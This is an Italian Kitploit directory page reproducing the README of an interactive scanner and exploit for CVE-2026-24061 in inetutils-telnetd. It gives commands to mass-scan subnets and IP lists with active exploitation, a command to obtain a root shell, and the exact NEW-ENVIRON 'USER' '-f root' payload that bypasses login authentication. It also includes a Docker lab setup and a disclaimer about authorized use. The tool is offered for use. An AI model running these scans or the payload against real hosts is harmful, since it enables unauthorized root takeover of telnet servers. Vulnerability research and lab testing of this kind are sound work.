Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061-telnet2root — Scanner ed exploit interattivo per CVE-2026-24061 in inetutils-telnetd, che consente l'accesso root pre-autenticazione tramite negoziazione NEW-ENVIRON appositamente costruita. Include scansione multi-thread e laboratorio Docker. | Kitploit
Strumenti/GitHubGitHub/furkankayapinar/cve-2026-24061-telnet2root
Scanner di VulnerabilitàExploitSicurezza di RetePenetration TestingStrumento di Accesso RemotoLab e Pratica
GitHubfurkankayapinar/cve-2026-24061-telnet2root

CVE-2026-24061-telnet2root

Scanner ed exploit interattivo per CVE-2026-24061 in inetutils-telnetd, che consente l'accesso root pre-autenticazione tramite negoziazione NEW-ENVIRON appositamente costruita. Include scansione multi-thread e laboratorio Docker.

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner ed Exploit per la Vulnerabilità CVE-2026-24061

License CVE

👨‍💻 Autore: Furkan KAYAPINAR (@FurkanKAYAPINAR)

Panoramica

Questo repository contiene uno scanner di vulnerabilità e un exploit interattivo per CVE-2026-24061. Questa vulnerabilità colpisce inetutils-telnetd (e potenzialmente altre implementazioni Telnet) attraverso una gestione impropria dell'opzione Telnet NEW-ENVIRON, consentendo l'accesso remoto pre-autenticazione utilizzando il payload -f root.

Funzionalità

  • scanner.py: Uno scanner multi-thread ed efficiente che supporta singoli target, sottoreti CIDR ed elenchi di IP. Include un flag opzionale per verificare l'RCE.
--exploit
  • exploit.py: Un client Telnet interattivo e robusto che automatizza la catena di exploit e apre una shell root all'utente in caso di successo.
  • Ambiente di Laboratorio: Un ambiente Ubuntu containerizzato con Docker che esegue una versione vulnerabile di inetutils-telnetd per test sicuri.
  • Installazione

    Assicurati di avere Python 3.x installato.

    root@kitploit:~
    git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
    cd CVE-2026-24061-telnet2root
    
    ## Utilizzo
    

    1. Scanner di Vulnerabilità

    Scansiona i target per la vulnerabilità NEW-ENVIRON.

    root@kitploit:~
    # Scansiona un singolo target
    python3 scanner.py -t 192.168.1.100 -p 1903
    
    # Scansiona una sottorete
    python3 scanner.py -s 192.168.1.0/24 -p 1903
    
    # Scansiona un elenco di IP e tenta lo sfruttamento attivo (verifica RCE)
    python3 scanner.py -l ips.txt -p 1903 --exploit
    

    2. Exploit Interattivo

    Ottieni accesso interattivo a una shell root.

    root@kitploit:~
    python3 exploit.py -t 127.0.0.1 -p 1903
    

    Configurazione dell'Ambiente di Laboratorio

    Distribuisci un ambiente locale vulnerabile per i test:

    1. Naviga nella directory del laboratorio:
      root@kitploit:~
      cd lab
      
    2. Compila e avvia il container:
      root@kitploit:~
      docker-compose up -d --build
      
      Il servizio sarà in ascolto sulla porta 1903.

    Dettagli Tecnici

    La vulnerabilità viene attivata durante la fase di negoziazione Telnet. Rispondendo alla richiesta DO NEW-ENVIRON del server con un pacchetto di sub-negoziazione IS VAR "USER" VALUE "-f root" appositamente costruito, il processo telnetd lato server viene indotto a passare il flag -f root al processo login, bypassando l'autenticazione.

    Disclaimer

    [!WARNING]
    Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopo educativo. L'accesso non autorizzato a sistemi informatici è illegale e non etico.

    Scarica lo strumento